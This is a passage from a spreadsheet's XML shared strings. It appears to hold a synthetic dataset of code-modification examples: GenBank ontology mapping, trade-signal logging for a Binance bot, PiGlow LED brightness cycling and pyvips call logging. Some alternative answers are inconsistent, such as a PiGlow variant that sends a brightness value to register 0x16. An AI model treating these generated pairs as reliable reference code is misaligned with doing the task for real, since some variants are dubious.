me_ql_dc_map)\n    rdfs_ontology.add_map(\'qualifier\', \'Brad\', me_ql_rdfs_map)\n\n    # -- write out the mappings in each of the categories\n    with open("genbank_ontology_map.txt", "w") as out_handle:\n        out_writer = csv.writer(out_handle, delimiter="\\t")\n        #Modify: Add columns for metadata\n        out_writer.writerow([\'gb section\', \'identifier\', \'ontology\',\n            \'namespace\', \'evidence\', \'description\', \'cardinality\'])\n        match_keys_to_ontology(\'header\', header_keys, [so_ontology, dc_ontology,\n            rdfs_ontology], out_writer, so_ontology)\n        match_keys_to_ontology(\'feature\', feature_keys, [so_ontology,\n            dc_ontology, rdfs_ontology], out_writer, so_ontology)\n        match_keys_to_ontology(\'qualifier\', qual_keys, [so_ontology,\n            dc_ontology, rdfs_ontology], out_writer, so_ontology)\n\n#Modify: Updated match_keys_to_ontology to handle metadata\ndef match_keys_to_ontology(key_type, keys, ontologies, out_writer, so_ontology):\n    no_matches = []\n    for cur_key in keys:\n        found_match = False\n        for ontology in ontologies:\n            match_key, origin = ontology.match_key_to_ontology(key_type, cur_key)\n            if match_key is not None:\n                #New: Extract metadata for output\n                description = so_ontology.qualifier_descriptions.get(cur_key, \'\') if key_type == \'qualifier\' else \'\'\n                cardinality = so_ontology.qualifier_cardinality.get(cur_key, \'\') if key_type == \'qualifier\' else \'\'\n                out_writer.writerow([key_type, cur_key, match_key, ontology.ns,\n                    origin, description, cardinality])\n                found_match = True\n                break\n        if not found_match:\n            out_writer.writerow([key_type, cur_key, \'\', \'\', \'\', \'\', \'\'])\n    for no_key in no_matches:\n        out_writer.writerow([key_type, no_key, \'\', \'\', \'\', \'\', \'\'])'}</t>
  </si>
  <si>
    <t># File 1: genbank_to_ontology.py
def parse_feature_table(ft_file):
    feature_keys = []
    qual_keys = []
    with open(ft_file) as ft_handle:
        in_feature_region = False
        for line in ft_handle:
            if in_feature_region:
                if line.strip() == "":
                    in_feature_region = False
                else:
                    qual_key, feature_key = line.strip().split()
                    qual_keys.append(qual_key)
                    feature_keys.append(feature_key)
            elif line.find('QUALIFIER FEATURE KEY') == 0:
                in_feature_region = True
    qual_keys = list(set(qual_keys))
    qual_keys = [k.replace('/', '') for k in qual_keys]
    feature_keys = list(set(feature_keys))
    qual_keys.sort()
    feature_keys.sort()
    # Modify: Add metadata
    metadata = {
        'num_features': len(feature_keys),
        'num_qualifiers': len(qual_keys)
    }
    return feature_keys, qual_keys, metadata  # Modify: Return metadata
# File 2: genbank_to_ontology.py
feature_keys, qual_keys, metadata = parse_feature_table(ft_file)  # Modify: Handle metadata
# New: Print metadata
print(f"Number of features: {metadata['num_features']}")
print(f"Number of qualifiers: {metadata['num_qualifiers']}")</t>
  </si>
  <si>
    <t>{'called_code_segment': 'LiveTradingConfig.py - Configuration variables (LOG_LEVEL, log_to_file, and new signal_log_to_file, signal_log_file_path)', 'invoking_code_segment': "LiveTrading.py - if __name__ == '__main__': block where configuration is logged and bots are initialized", 'feature_description': 'Add a feature to log trade signals to a file. This includes adding new configuration options to enable signal logging and specifying the log file path, then modifying the LiveTrading.py to initialize signal logging and pass the logging configuration to the bot setup and trade manager.', 'modified_complete_code': "# LiveTradingConfig.py modifications:\n\nAPI_KEY = ''\nAPI_SECRET = ''\n\ntrading_strategy = 'tripleEMAStochasticRSIATR'\nTP_SL_choice = '%'\nleverage = 10\norder_size = 3\ninterval = '1m'\nSL_mult = 1.5\nTP_mult = 1\ntrade_all_symbols = True\nsymbols_to_trade = ['BTCUSDT']\ncoin_exclusion_list = ['USDCUSDT', 'BTCDOMUSDT']\nuse_trailing_stop = False\ntrailing_stop_callback = .1\ntrading_threshold = .3\nuse_market_orders = False\nmax_number_of_positions = 10\nwait_for_candle_close = True\nauto_calculate_buffer = True\nbuffer = '3 hours ago'\n\n## Logging configuration\nLOG_LEVEL = 20\nlog_to_file = False\n\n#New - Signal logging configuration\nsignal_log_to_file = True\nsignal_log_file_path = './logs/trade_signals.log'\n\nuse_multiprocessing_for_trade_execution = True\ncustom_tp_sl_functions = ['USDT']\nmake_decision_options = {}\n\n# LiveTrading.py modifications:\n\nimport asyncio\nfrom pprint import PrettyPrinter\nfrom LiveTradingConfig import *\nfrom LiveTradingConfig import symbols_to_trade\nfrom LiveTradingConfig import buffer\n#New - Import signal logging configuration\nfrom LiveTradingConfig import signal_log_to_file, signal_log_file_path\n\nimport SharedHelper\nfrom Helper import *\nfrom TradeManager import *\nfrom threading import Thread\nimport multiprocessing\nfrom queue import Queue\nimport os\n#New - Import logging module for signal logging\nimport logging\n\nos.environ['TYPE_CHECKING'] = 'False'\n\n#New - Initialize signal logger\ndef setup_signal_logger():\n    if signal_log_to_file:\n        os.makedirs(os.path.dirname(signal_log_file_path), exist_ok=True)\n        signal_logger = logging.getLogger('trade_signals')\n        signal_logger.setLevel(logging.INFO)\n        file_handler = logging.FileHandler(signal_log_file_path)\n        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n        file_handler.setFormatter(formatter)\n        signal_logger.addHandler(file_handler)\n        return signal_logger\n    return None\n\nif __name__ == '__main__':\n    #New - Setup signal logging\n    signal_logger = setup_signal_logger()\n    \n    log.info(f'Configuration:\\ntrading strategy: {trading_strategy}\\nleverage: {leverage}\\norder size: {order_size}\\n'\n             f'interval: {interval}\\nTP/SL choice: {TP_SL_choice}\\nSL mult: {SL_mult}\\nTP mult: {TP_mult}\\n'\n             f'trade all symbols: {trade_all_symbols}\\nsymbols to trade: {symbols_to_trade}\\nuse trailing stop: {use_trailing_stop}\\n'\n             f'trailing stop callback: {trailing_stop_callback}\\ntrading threshold: {trading_threshold}\\nuse market orders: {use_market_orders}\\n'\n             f'max number of positions: {max_number_of_positions}\\nuse multiprocessing for trade execution: {use_multiprocessing_for_trade_execution}\\n'\n             f'custom TP/SL Functions: {custom_tp_sl_functions}\\nmake decision options: {make_decision_options}\\n'\n             #Modify - Add signal logging configuration to log output\n             f'signal log to file: {signal_log_to_file}\\nsignal log file path: {signal_log_file_path}\\n')\n    \n    if os.name == 'nt':\n        asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())\n    pp = PrettyPrinter()\n    Bots: [BotClass.Bot] = []\n    signal_queue = None\n    print_trades_q = None\n    if use_multiprocessing_for_trade_execution:\n        signal_queue = multiprocessing.Queue()\n        print_trades_q = multiprocessing.Queue()\n    else:\n        signal_queue = Queue()\n        print_trades_q = Queue()\n\n    python_binance_client = Client(api_key=API_KEY, api_secret=API_SECRET)\n    client = CustomClient(python_binance_client)\n    if trade_all_symbols:\n        symbols_to_trade = SharedHelper.get_all_symbols(python_binance_client, coin_exclusion_list)\n\n    client.set_leverage(symbols_to_trade)\n\n    #Modify - Pass signal logger to bot setup\n    client.setup_bots(Bots, symbols_to_trade, signal_queue, print_trades_q, signal_logger)\n\n    client.start_websockets(Bots)\n\n    new_trade_loop = None\n    TM = None\n    if use_multiprocessing_for_trade_execution:\n        new_trade_loop = multiprocessing.Process(target=start_new_trades_loop_multiprocess, args=(python_binance_client, signal_queue, print_trades_q, signal_logger))\n        new_trade_loop.start()\n    else:\n        #Modify - Pass signal logger to TradeManager\n        TM = TradeManager(python_binance_client, signal_queue, print_trades_q, signal_logger)\n        new_trade_loop = Thread(target=TM.new_trades_loop)\n        new_trade_loop.daemon = True\n        new_trade_loop.start()\n\n    ping_server_reconnect_sockets_thread = Thread(target=client.ping_server_reconnect_sockets, args=(Bots,))\n    ping_server_reconnect_sockets_thread.daemon = True\n    ping_server_reconnect_sockets_thread.start()\n\n    if auto_calculate_buffer:\n        buffer_int = SharedHelper.get_required_buffer(trading_strategy)\n        buffer = convert_buffer_to_string(buffer_int)\n    combine_data_thread = Thread(target=client.combine_data, args=(Bots, symbols_to_trade, buffer))\n    combine_data_thread.daemon = True\n    combine_data_thread.start()\n    new_trade_loop.join()"}</t>
  </si>
  <si>
    <t>{'LiveTrading.py': "if __name__ == '__main__':\n    ...\n    if use_multiprocessing_for_trade_execution:\n        new_trade_loop = multiprocessing.Process(target=start_new_trades_loop_multiprocess, args=(python_binance_client, signal_queue, print_trades_q))\n        new_trade_loop.start()\n    else:\n        TM = TradeManager(python_binance_client, signal_queue, print_trades_q, 'trade_signals.log')  #Modify\n        new_trade_loop = Thread(target=TM.new_trades_loop)\n        new_trade_loop.daemon = True\n        new_trade_loop.start()\n    ...\n", 'TradeManager.py': "class TradeManager:\n    def __init__(self, client, signal_queue, print_trades_q, log_file):\n        self.client = client\n        self.signal_queue = signal_queue\n        self.print_trades_q = print_trades_q\n        self.log_file = log_file  #Modify\n\n    def new_trades_loop(self):\n        while True:\n            if not self.signal_queue.empty():\n                signal = self.signal_queue.get()\n                self.log_signal(signal)  #Modify\n                self.process_signal(signal)\n\n    def log_signal(self, signal):\n        with open(self.log_file, 'a') as f:\n            f.write(f'{signal}\\n')  #New\n"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def colour(self, colour, value):\n        if colour == 1 or colour == "white":\n            self.bus.write_byte_data(0x54, 0x0A, value)\n            self.bus.write_byte_data(0x54, 0x0B, value)\n            self.bus.write_byte_data(0x54, 0x0D, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        elif colour == 2 or colour == "blue":\n            self.bus.write_byte_data(0x54, 0x05, value)\n            self.bus.write_byte_data(0x54, 0x0C, value)\n            self.bus.write_byte_data(0x54, 0x0F, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        elif colour == 3 or colour == "green":\n            self.bus.write_byte_data(0x54, 0x06, value)\n            self.bus.write_byte_data(0x54, 0x04, value)\n            self.bus.write_byte_data(0x54, 0x0E, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        elif colour == 4 or colour == "yellow":\n            self.bus.write_byte_data(0x54, 0x09, value)\n            self.bus.write_byte_data(0x54, 0x03, value)\n            self.bus.write_byte_data(0x54, 0x10, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        elif colour == 5 or colour == "orange":\n            self.bus.write_byte_data(0x54, 0x08, value)\n            self.bus.write_byte_data(0x54, 0x02, value)\n            self.bus.write_byte_data(0x54, 0x11, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        elif colour == 6 or colour == "red":\n            self.bus.write_byte_data(0x54, 0x07, value)\n            self.bus.write_byte_data(0x54, 0x01, value)\n            self.bus.write_byte_data(0x54, 0x12, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        else:\n            print "Only colours 1 - 6 or color names are allowed"', 'invoking_code_segment': 'piglow = PiGlow()\nval = 20\ncolour = 1\n\nwhile True:\n    if colour == 7:\n        colour = 1\n        if val == 20:\n            val = 0\n        else:\n            val = 20\n\n    piglow.colour(colour, val)\n    sleep(0.2)\n\n    colour = colour + 1', 'feature_description': 'Add a feature to allow cycling through brightness levels for each color. The feature enables smooth brightness transitions by cycling through multiple brightness levels (0, 50, 100, 150, 200, 255) for each color before moving to the next color, creating a pulsing effect.', 'modified_complete_code': '# PiGlow/piglow.py - Modified sections\n\nclass PiGlow:\n    # ... existing __init__ and other methods ...\n\n    def colour(self, colour, value):\n        if colour == 1 or colour == "white":\n            self.bus.write_byte_data(0x54, 0x0A, value)\n            self.bus.write_byte_data(0x54, 0x0B, value)\n            self.bus.write_byte_data(0x54, 0x0D, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n\n        elif colour == 2 or colour == "blue":\n            self.bus.write_byte_data(0x54, 0x05, value)\n            self.bus.write_byte_data(0x54, 0x0C, value)\n            self.bus.write_byte_data(0x54, 0x0F, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n\n        elif colour == 3 or colour == "green":\n            self.bus.write_byte_data(0x54, 0x06, value)\n            self.bus.write_byte_data(0x54, 0x04, value)\n            self.bus.write_byte_data(0x54, 0x0E, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n\n        elif colour == 4 or colour == "yellow":\n            self.bus.write_byte_data(0x54, 0x09, value)\n            self.bus.write_byte_data(0x54, 0x03, value)\n            self.bus.write_byte_data(0x54, 0x10, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n\n        elif colour == 5 or colour == "orange":\n            self.bus.write_byte_data(0x54, 0x08, value)\n            self.bus.write_byte_data(0x54, 0x02, value)\n            self.bus.write_byte_data(0x54, 0x11, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        elif colour == 6 or colour == "red":\n            self.bus.write_byte_data(0x54, 0x07, value)\n            self.bus.write_byte_data(0x54, 0x01, value)\n            self.bus.write_byte_data(0x54, 0x12, value)\n            self.bus.write_byte_data(0x54, 0x16, 0xFF)\n        else:\n            print "Only colours 1 - 6 or color names are allowed"\n\n    #New - Add method to cycle brightness levels for a color\n    def colour_pulse(self, colour, brightness_levels=None):\n        """Cycle through brightness levels for a given color"""\n        if brightness_levels is None:\n            brightness_levels = [0, 50, 100, 150, 200, 255]\n        for brightness in brightness_levels:\n            self.colour(colour, brightness)\n\n    # ... rest of existing methods ...\n\n\n# PiGlow/Examples/cycle2.py - Modified sections\n\nfrom piglow import PiGlow\nfrom time import sleep\n\npiglow = PiGlow()\n#Modify - Add brightness levels list for cycling\nbrightness_levels = [0, 50, 100, 150, 200, 255]\ncolour = 1\nbrightness_index = 0\n\nwhile True:\n    #Modify - Cycle through brightness levels for each color\n    piglow.colour(colour, brightness_levels[brightness_index])\n    sleep(0.2)\n    \n    brightness_index += 1\n    #Modify - Move to next color when brightness cycle completes\n    if brightness_index &gt;= len(brightness_levels):\n        brightness_index = 0\n        colour += 1\n        if colour == 7:\n            colour = 1'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def colour(self, colour, value, brightness=255):\n    #Modify: Added brightness parameter\n    if colour == 1 or colour == "white":\n        self.bus.write_byte_data(0x54, 0x0A, value)\n        self.bus.write_byte_data(0x54, 0x0B, value)\n        self.bus.write_byte_data(0x54, 0x0D, value)\n        self.bus.write_byte_data(0x54, 0x16, brightness)  #Modify: Changed to use brightness\n    elif colour == 2 or colour == "blue":\n        self.bus.write_byte_data(0x54, 0x05, value)\n        self.bus.write_byte_data(0x54, 0x0C, value)\n        self.bus.write_byte_data(0x54, 0x0F, value)\n        self.bus.write_byte_data(0x54, 0x16, brightness)  #Modify: Changed to use brightness\n    elif colour == 3 or colour == "green":\n        self.bus.write_byte_data(0x54, 0x06, value)\n        self.bus.write_byte_data(0x54, 0x04, value)\n        self.bus.write_byte_data(0x54, 0x0E, value)\n        self.bus.write_byte_data(0x54, 0x16, brightness)  #Modify: Changed to use brightness\n    elif colour == 4 or colour == "yellow":\n        self.bus.write_byte_data(0x54, 0x09, value)\n        self.bus.write_byte_data(0x54, 0x03, value)\n        self.bus.write_byte_data(0x54, 0x10, value)\n        self.bus.write_byte_data(0x54, 0x16, brightness)  #Modify: Changed to use brightness\n    elif colour == 5 or colour == "orange":\n        self.bus.write_byte_data(0x54, 0x08, value)\n        self.bus.write_byte_data(0x54, 0x02, value)\n        self.bus.write_byte_data(0x54, 0x11, value)\n        self.bus.write_byte_data(0x54, 0x16, brightness)  #Modify: Changed to use brightness\n    elif colour == 6 or colour == "red":\n        self.bus.write_byte_data(0x54, 0x07, value)\n        self.bus.write_byte_data(0x54, 0x01, value)\n        self.bus.write_byte_data(0x54, 0x12, value)\n        self.bus.write_byte_data(0x54, 0x16, brightness)  #Modify: Changed to use brightness\n    else:\n        print "Only colours 1 - 6 or color names are allowed"', '#file 2': 'piglow = PiGlow()\nval = 20\ncolour = 1\nbrightness = 50  #New: Added brightness variable\n\nwhile True:\n    if colour == 7:\n        colour = 1\n        if val == 20:\n            val = 0\n        else:\n            val = 20\n        brightness = (brightness + 50) % 256  #New: Cycle through brightness levels\n\n    piglow.colour(colour, val, brightness)  #Modify: Added brightness parameter\n    sleep(0.2)\n\n    colour = colour + 1'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'Operation.call(operation_name, *args, **kwargs) method in pyvips/pyvips/voperation.py', 'invoking_code_segment': 'from .voperation import * in pyvips/pyvips/__init__.py which imports Operation class and its call method', 'feature_description': 'Add a new feature to log additional information before calling the operation, including operation name, arguments, and keyword arguments with timestamps and operation details', 'modified_complete_code': '# pyvips/pyvips/voperation.py - MODIFIED\n\nfrom __future__ import division, print_function\n\nimport logging\nimport time  # #New\n\nimport pyvips\nfrom pyvips import ffi, vips_lib, Error, _to_bytes, _to_string, GValue, \\\n    type_map, type_from_name, nickname_find, at_least_libvips\n\nlogger = logging.getLogger(__name__)\n\n# values for VipsArgumentFlags\n_REQUIRED = 1\n_CONSTRUCT = 2\n_SET_ONCE = 4\n_SET_ALWAYS = 8\n_INPUT = 16\n_OUTPUT = 32\n_DEPRECATED = 64\n_MODIFY = 128\n\n# for VipsOperationFlags\n_OPERATION_DEPRECATED = 8\n\n# #New - Add operation call logger\n_operation_logger = logging.getLogger(__name__ + \'.operations\')\n\nclass Introspect(object):\n    """Build introspection data for operations.\n\n    Make an operation, introspect it, and build a structure representing\n    everything we know about it.\n\n    """\n    __slots__ = (\'description\', \'flags\', \'details\',\n                 \'required_input\', \'optional_input\',\n                 \'required_output\', \'optional_output\',\n                 \'doc_optional_input\', \'doc_optional_output\',\n                 \'member_x\', \'method_args\')\n\n    def __init__(self, operation_name):\n        op = Operation.new_from_name(operation_name)\n\n        self.description = op.get_description()\n        self.flags = vips_lib.vips_operation_get_flags(op.pointer)\n\n        # build a list of constructor arg [name, flags] pairs in arg order\n        arguments = []\n\n        def add_args(name, flags):\n            if (flags &amp; _CONSTRUCT) != 0:\n                # libvips uses \'-\' to separate parts of arg names, but we\n                # need \'_\' for Python\n                name = name.replace(\'-\', \'_\')\n                arguments.append([name, flags])\n\n        if at_least_libvips(8, 7):\n            p_names = ffi.new(\'char**[1]\')\n            p_flags = ffi.new(\'int*[1]\')\n            p_n_args = ffi.new(\'int[1]\')\n            result = vips_lib.vips_object_get_args(op.vobject,\n                                                   p_names, p_flags, p_n_args)\n            if result != 0:\n                raise Error(\'unable to get arguments from operation\')\n            p_names = p_names[0]\n            p_flags = p_flags[0]\n            n_args = p_n_args[0]\n\n            for i in range(0, n_args):\n                add_args(_to_string(p_names[i]), p_flags[i])\n        else:\n            def add_construct(self, pspec, argument_class,\n                              argument_instance, a, b):\n                add_args(_to_string(pspec.name), argument_class.flags)\n                return ffi.NULL\n\n            cb = ffi.callback(\'VipsArgumentMapFn\', add_construct)\n            vips_lib.vips_argument_map(op.vobject, cb, ffi.NULL, ffi.NULL)\n\n        # logger.debug(\'arguments = %s\', self.arguments)\n\n        # build a hash from arg name to detailed arg information\n        self.details = {}\n        for name, flags in arguments:\n            self.details[name] = {\n                "name": name,\n                "flags": flags,\n                "blurb": op.get_blurb(name),\n                "type": op.get_typeof(name)\n            }\n\n        # lists of arg names by category\n        self.required_input = []\n        self.optional_input = []\n        self.required_output = []\n        self.optional_output = []\n\n        # same, but with deprecated args filtered out ... this is the set we\n        # show in documentation\n        self.doc_optional_input = []\n        self.doc_optional_output = []\n\n        for name, flags in arguments:\n            if ((flags &amp; _INPUT) != 0 and\n                    (flags &amp; _REQUIRED) != 0 and\n                    (flags &amp; _DEPRECATED) == 0):\n                self.required_input.append(name)\n\n                # required inputs which we MODIFY are also required outputs\n                if (flags &amp; _MODIFY) != 0:\n                    self.required_output.append(name)\n\n            if ((flags &amp; _OUTPUT) != 0 and\n                    (flags &amp; _REQUIRED) != 0 and\n                    (flags &amp; _DEPRECATED) == 0):\n                self.required_output.append(name)\n\n            # deprecated optional args get on to the main arg lists, but are\n            # filtered from the documented set\n            if ((flags &amp; _INPUT) != 0 and\n                    (flags &amp; _REQUIRED) == 0):\n                self.optional_input.append(name)\n\n                if (flags &amp; _DEPRECATED) == 0:\n                    self.doc_optional_input.append(name)\n\n            if ((flags &amp; _OUTPUT) != 0 and\n                    (flags &amp; _REQUIRED) == 0):\n                self.optional_output.append(name)\n\n                if (flags &amp; _DEPRECATED) == 0:\n                    self.doc_optional_output.append(name)\n\n        # find the first required input image arg, if any ... that will be self\n        self.member_x = None\n        for name in self.required_input:\n            details = self.details[name]\n            if details[\'type\'] == GValue.image_type:\n                self.member_x = name\n                break\n\n        # method args are required args, but without the image they are a\n        # method on\n        if self.member_x is not None:\n            self.method_args = list(self.required_input)\n            self.method_args.remove(self.member_x)\n        else:\n            self.method_args = self.required_input\n\n    # a hash mapping operation names to introspection data\n    _introspect_cache = {}\n\n    @classmethod\n    def get(cls, operation_name):\n        if operation_name not in cls._introspect_cache:\n            cls._introspect_cache[operation_name] = Introspect(operation_name)\n\n        return cls._introspect_cache[operation_name]\n\n\n# search an array with a predicate, recursing into subarrays as we see them\n# used to find the match_image for an operation\ndef _find_inside(pred, thing):\n    if pred(thing):\n        return thing\n\n    if isinstance(thing, list) or isinstance(thing, tuple):\n        for x in thing:\n            result = _find_inside(pred, x)\n\n            if result is not None:\n                return result\n\n    return None\n\n\n# #New - Helper function to log operation call details\ndef _log_operation_call(operation_name, args, kwargs, intro):\n    """Log detailed information about an operation call."""\n    timestamp = time.time()\n    _operation_logger.debug(\n        \'Operation call: name=%s, timestamp=%s, required_inputs=%d, \'\n        \'optional_inputs=%d, required_outputs=%d, optional_outputs=%d\',\n        operation_name, timestamp, len(intro.required_input),\n        len(intro.optional_input), len(intro.required_output),\n        len(intro.optional_output)\n    )\n    _operation_logger.debug(\n        \'Operation args: positional_count=%d, keyword_count=%d\',\n        len(args), len(kwargs)\n    )\n    if kwargs:\n        _operation_logger.debug(\'Operation kwargs keys: %s\', list(kwargs.keys()))\n\n\nclass Operation(pyvips.VipsObject):\n    """Call libvips operations.\n\n    This class wraps the libvips VipsOperation class.\n\n    """\n    __slots__ = ()\n\n    # cache nickname -&gt; docstring here\n    _docstring_cache = {}\n\n    def __init__(self, pointer):\n        # logger.debug(\'Operation.__init__: pointer = %s\', pointer)\n        super(Operation, self).__init__(pointer)\n\n    @staticmethod\n    def new_from_name(operation_name):\n        vop = vips_lib.vips_operation_new(_to_bytes(operation_name))\n        if vop == ffi.NULL:\n            raise Error(\'no such operation {0}\'.format(operation_name))\n        return Operation(vop)\n\n    def set(self, name, flags, match_image, value):\n        # if the object wants an image and we have a constant, _imageize it\n        #\n        # if the object wants an image array, _imageize any constants in the\n        # array\n        if match_image:\n            gtype = self.get_typeof(name)\n\n            if gtype == pyvips.GValue.image_type:\n                value = pyvips.Image._imageize(match_image, value)\n            elif gtype == pyvips.GValue.array_image_type:\n                value = [pyvips.Image._imageize(match_image, x)\n                         for x in value]\n\n        # MODIFY args need to be copied before they are set\n        if (flags &amp; _MODIFY) != 0:\n            # logger.debug(\'copying MODIFY arg %s\', name)\n            # make sure we have a unique copy\n            value = value.copy().copy_memory()\n\n        super(Operation, self).set(name, value)\n\n    @staticmethod\n    def call(operation_name, *args, **kwargs):\n        """Call a libvips operation.\n\n        Use this method to call any libvips operation. For example::\n\n            black_image = pyvips.Operation.call(\'black\', 10, 10)\n\n        See the Introduction for notes on how this works.\n\n        """\n\n        logger.debug(\'VipsOperation.call: operation_name = %s\', operation_name)\n        # logger.debug(\'VipsOperation.call: args = %s, kwargs =%s\',\n        #              args, kwargs)\n\n        intro = Introspect.get(operation_name)\n        \n        # #Modify - Log operation call details before processing\n        _log_operation_call(operation_name, args, kwargs, intro)\n\n        if len(intro.required_input) != len(args):\n            raise Error(\'{0} needs {1} arguments, but {2} given\'\n                        .format(operation_name,\n                                len(intro.required_input),\n                                len(args)))\n\n        op = Operation.new_from_name(operation_name)\n\n        # set any string options before any args so they can\'t be\n        # overridden\n        string_options = kwargs.pop(\'string_options\', \'\')\n        if not op.set_string(string_options):\n            raise Error(\'unable to call {0}\'.format(operation_name))\n\n        # the first image argument is the thing we expand constants to\n        # match ... look inside tables for images, since we may be passing\n        # an array of images as a single param\n        match_image = _find_inside(lambda x: isinstance(x, pyvips.Image),\n                                   args)\n\n        logger.debug(\'VipsOperation.call: match_image = %s\', match_image)\n\n        # collect a list of all input references here\n        # we can\'t use a set because set elements are unique under "==", and\n        # Python checks memoryview equality with hash functions, not pointer\n        # equality\n        references = []\n\n        # does a list contain an element using pointer equality\n        # we can\'t use "in" since that uses "==", which means hash equality\n        def contains(array, x):\n            for y in array:\n                if id(x) == id(y):\n                    return True\n            return False\n\n        def add_reference(x):\n            if isinstance(x, pyvips.Image):\n                for i in x._references:\n                    if not contains(references, i):\n                        references.append(i)\n            return False\n\n        # set required input args\n        for name, value in zip(intro.required_input, args):\n            _find_inside(add_reference, value)\n            op.set(name, intro.details[name][\'flags\'], match_image, value)\n\n        # set any optional args\n        for name in kwargs:\n            if (name not in intro.optional_input and\n                    name not in intro.optional_output):\n                raise Error(\'{0} does not support optional argument {1}\'\n                            .format(operation_name, name))\n\n            value = kwargs[name]\n            details = intro.details[name]\n\n            if (details[\'flags\'] &amp; _DEPRECATED) != 0:\n                logger.info(\'%s argument %s is deprecated\',\n                            operation_name, name)\n\n            _find_inside(add_reference, value)\n            op.set(name, details[\'flags\'], match_image, value)\n\n        # build operation\n        vop = vips_lib.vips_cache_operation_build(op.pointer)\n        if vop == ffi.NULL:\n            vips_lib.vips_object_unref_outputs(op.vobject)\n            raise Error(\'unable to call {0}\'.format(operation_name))\n        op = Operation(vop)\n\n        # attach all input refs to output x\n        def set_reference(x):\n            if isinstance(x, pyvips.Image):\n                x._references.extend(references)\n            return False\n\n        # fetch required output args (plus modified input images)\n        result = []\n        for name in intro.required_output:\n            value = op.get(name)\n            _find_inside(set_reference, value)\n            result.append(value)\n\n        # fetch optional output args\n        opts = {}\n        for name in intro.optional_output:\n            if name in kwargs:\n                value = op.get(name)\n                _find_inside(set_reference, value)\n                opts[name] = value\n\n        if len(opts) &gt; 0:\n            result.append(opts)\n\n        vips_lib.vips_object_unref_outputs(op.vobject)\n\n        if len(result) == 0:\n            result = None\n        elif len(result) == 1:\n            result = result[0]\n\n        logger.debug(\'VipsOperation.call: result = %s\', result)\n\n        return result\n\n    @staticmethod\n    def generate_docstring(operation_name):\n        """Make a google-style docstring.\n\n        This is used to generate help() output.\n\n        """\n\n        # we cache these to save regeneration\n        if operation_name in Operation._docstring_cache:\n            return Operation._docstring_cache[operation_name]\n\n        intro = Introspect.get(operation_name)\n        if (intro.flags &amp; _OPERATION_DEPRECATED) != 0:\n            raise Error(\'No such operator.\',\n                        \'operator "{0}" is deprecated\'.format(operation_name))\n\n        result = intro.description[0].upper() + intro.description[1:] + \'.\\n\\n\'\n        result += \'Example:\\n\'\n\n        result += \'   \' + \', \'.join(intro.required_output) + \' = \'\n        if intro.member_x is not None:\n            result += intro.member_x + \'.\' + operation_name + \'(\'\n        else:\n            result += \'pyvips.Image.\' + operation_name + \'(\'\n\n        args = []\n        args += intro.method_args\n        args += [x + \'=\' + GValue.gtype_to_python(intro.details[x][\'type\'])\n                 for x in intro.doc_optional_input]\n        args += [x + \'=bool\'\n                 for x in intro.doc_optional_output]\n        result += ", ".join(args) + \')\\n\'\n\n        def argstr(name):\n            details = intro.details[name]\n            return (u\'    {0} ({1}): {2}\\n\'.\n                    format(name,\n                           GValue.gtype_to_python(details[\'type\']),\n                           details[\'blurb\']))\n\n        result += \'\\nReturns:\\n\'\n        for name in intro.required_output:\n            result += argstr(name)\n\n        result += \'\\nArgs:\\n\'\n        if intro.member_x is not None:\n            result += argstr(intro.member_x)\n        for name in intro.method_args:\n            result += argstr(name)\n\n        if len(intro.doc_optional_input) &gt; 0:\n            result += \'\\nKeyword args:\\n\'\n            for name in intro.doc_optional_input:\n                result += argstr(name)\n\n        if len(intro.doc_optional_output) &gt; 0:\n            result += \'\\nOther Parameters:\\n\'\n            for name in intro.doc_optional_output:\n                result += argstr(name)\n\n        result += \'\\nRaises:\\n    :class:`.Error`\\n\'\n\n        # add to cache to save building again\n        Operation._docstring_cache[operation_name] = result\n\n        return result\n\n    @staticmethod\n    def generate_sphinx(operation_name):\n        """Make a sphinx-style docstring.\n\n        This is used to generate the off-line docs.\n\n        """\n\n        intro = Introspect.get(operation_name)\n        if (intro.flags &amp; _OPERATION_DEPRECATED) != 0:\n            raise Error(\'No such operator.\',\n                        \'operator "{0}" is deprecated\'.format(operation_name))\n\n        if intro.member_x is not None:\n            result = \'.. method:: \'\n        else:\n            result = \'.. staticmethod:: \'\n        args = []\n        args += intro.method_args\n        args += [x + \'=\' + GValue.gtype_to_python(intro.details[x][\'type\'])\n                 for x in intro.doc_optional_input]\n        args += [x + \'=bool\'\n                 for x in intro.doc_optional_output]\n        result += operation_name + \'(\' + ", ".join(args) + \')\\n\\n\'\n\n        result += intro.description[0].upper() + \\\n            intro.description[1:] + \'.\\n\\n\'\n\n        result += \'Example:\\n\'\n        result += \'    \'\n        if len(intro.required_output) &gt; 0:\n            result += \', \'.join(intro.required_output) + \' = \'\n        if intro.member_x is not None:\n            result += intro.member_x + "." + operation_name + \'(\'\n        else:\n            result += \'pyvips.Image.\' + operation_name + \'(\'\n        args = []\n        args += intro.method_args\n        args += [x + \'=\' + GValue.gtype_to_python(intro.details[x][\'type\'])\n                 for x in intro.doc_optional_input]\n        result += \', \'.join(args)\n        result += \')\\n\\n\'\n\n        for name in intro.method_args + intro.doc_optional_input:\n            details = intro.details[name]\n            result += (\':param {0}: {1}\\n\'.\n                       format(name, details[\'blurb\']))\n            result += (\':type {0}: {1}\\n\'.\n                       format(name, GValue.gtype_to_python(details[\'type\'])))\n        for name in intro.doc_optional_output:\n            result += (\':param {0}: enable output: {1}\\n\'.\n                       format(name, intro.details[name][\'blurb\']))\n            result += (\':type {0}: bool\\n\'.format(name))\n\n        output_types = [GValue.gtype_to_python(intro.details[name][\'type\'])\n                        for name in intro.required_output]\n        if len(output_types) == 1:\n            output_type = output_types[0]\n        else:\n            output_type = \'list[\' + 